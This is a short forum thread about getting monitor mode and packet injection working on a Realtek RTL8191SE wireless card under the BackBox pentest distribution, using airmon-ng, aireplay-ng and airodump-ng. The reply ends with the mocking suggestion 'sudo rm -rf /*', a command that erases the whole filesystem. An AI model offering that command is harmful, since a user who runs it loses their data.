RTL8191SEvB

Started by redux, September 17, 2012, 03:31:49 PM

Previous topic - Next topic

redux

Hi Guys,

Can't seem to get out of the box support, any ideas of first port of call to get drivers with injection support.

Had no issues with BT5r3 however I would prefer to use backbox if possible as I prefer it as my pentest distro of choice as I often have to use it as my daily desktop OS.

This is the output I get from :

xxx@xxx~$sudo airmon-ng start wlan0

Interface Chipset Driver

wlan0 Unknown rtl819xSE - [phy0]mon0: ERROR while getting interface flags: No such device

(monitor mode enabled on mon0)



xxx@xxx~$ sudo aireplay-ng -9 mon0
Interface mon0:
ioctl(SIOCGIFINDEX) failed: No such device



Help !

redux

ZEROF

#1
Hi,

Try to kill all process that are giving issues, dhclient, network-manager, wpa_supplicant, avahi-daemon. Then:

sudo iwconfig wlan0 mode monitor
sudo airodump-ng wlan0

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*